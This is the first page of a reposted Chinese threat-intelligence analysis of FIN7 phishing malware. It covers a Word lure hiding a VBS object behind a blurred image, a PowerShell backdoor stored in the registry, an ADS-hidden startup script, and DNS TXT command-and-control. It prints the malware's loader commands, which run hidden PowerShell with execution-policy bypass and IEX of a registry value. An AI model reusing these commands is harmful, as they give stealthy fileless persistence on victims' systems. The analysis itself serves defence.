欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

FIN7 APT组织攻击木马分析报告

来源:本站整理 作者:佚名 时间:2017-06-19 TAG: 我要投稿

2017年3月,FireEye发布了一篇名黑客组织FIN7的APT攻击简报,报告称FIN7组织以钓鱼邮件为攻击渠道,主要对美国金融机构渗透攻击。组织的攻击利用DNS协议的TXT字段进行C&C通信。360威胁情报中心对此APT组织的攻击链条进行了梳理,对木马相关的技术进行了分析,揭示其一些有意思的技巧。
目标样本
Hash
d04b6410dddee19adec75f597c52e386
文件类型
Word文档
文件大小
1,834,496字节
攻击特点与攻击流程
FIN7攻击特点主要体现在:
1. 全部攻击过程使用非PE实现,钓鱼使用doc文件,后门使用powershell文件。
2. 使用ADS数据隐藏保存在磁盘中的非PE文件
3. 后门文件保存在注册表中,功能由Powershell实现
4. 与C&C通信使用DNS协议的TXT记录
5. C&C地址从64个硬编码的地址中随机选择
攻击流程:
在整个攻击过程中,没有使用到PE文件,这在一定程度上躲避了安全软件的查杀。落地的文件也进行了技术上的隐藏,而真正的后门程序却已加密的方式存储在注册表中。
攻击者以钓鱼邮件为进入渠道,在恶意文档中嵌入vbs脚本,vbs脚本运行后解密后门程序写入注册表中,同时将调用后门程序的脚本以ads隐藏在磁盘文件中。在后门运行后,使用DNS TXT做为C&C通信方式。

样本分析
钓鱼邮件打开后,显示如下图所示,可以看到,文档中插入了一张图片,图片字体显示模糊。
 

通过分析,得到了钓鱼文档的制作过程:分别插入了一个vbs的OLE对象与一张字迹模糊的图片,将OLE对象的图标设置为透明图标并置入图片对象的顶层,最将两个对象组合到一起,这样就达到了双击图片,实际上运行了vbs脚本的目的。
双击图片,就会打开vbs脚本,只有当用户点击弹出的对话框中的确定后,才会运行vbs脚本,如果在这时,用户点击了取消,就可以阻断这次攻击。

为了诱导用户双击图片运行vbs脚本,文档中还写入“This document is protected by Microsoft Office and requires human verification Please Enable Editing and Double Click on page below.”(文档被Microsoft Office 保护,请启用编辑并双击下面的图片)。
VBS功能:
当上面的图片被双击运行后,程序后台会运行VBS脚本,该脚本功能为:调用powershell解密一大段字符,从代码中可以看出,解密出来的为一gz文件,因此可以将这大段base64解密后,保存成gz格式,使用解压工具得到压缩文件继续分析。

样本加载感染过程:
gz中的文件也是一个powershell脚本。脚本经过混淆,实现的功能是:判断当前用户是不是administartor权限,根据不同的权限写入不同的注册表内容,这些内容为开机后会解密执行的代码,随后通过ADS将加载注册表内容的vbs脚本写入C:\ProgramData\windows :CtxDnsClient.vbs文件中,并将该文件加入启动项和计划任务中。
 原始的powershell内容,可以看到powershell脚本经过了混淆:

后门程序写入注册表
Powershell写入到注册表中的后门程序的内容如下:

ADS隐藏磁盘文件
将要实现开机启动的文件写入到磁盘文件C:\ProgramData\Windows:CtxDnsClient.vbs中。
对于Windows:CtxDnsClient.vbs文件,使用了ADS数据隐藏技术。而通过ADS隐藏的数据在Windows系统中无法显示,文件大小也显示为0字节:

 
但是使用dir /r命令,可以看到ADS中有隐藏的数据

 
启动项中的隐藏的ads数据,dump出来后显示如下:

 
使用 ADS中隐藏数据内容为:
cmd /c "echo Set objShell = CreateObject(""Wscript.shell"") > C:\ProgramData\Windows:CtxDnsClient.vbs"
cmd /c "echo objShell.run ""powershell -WindowStyle Hidden -executionpolicy bypass -C IEX ((Get-ItemProperty -Path HKCU:Software\Microsoft\Windows).Part)"",0 >> C:\ProgramData\Windows:CtxDnsClient.vbs"
添加开机启动
创建的启动项,启动项位置为HKCU\Software\Microsoft\Windows\CurrentVersion\Run\:

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载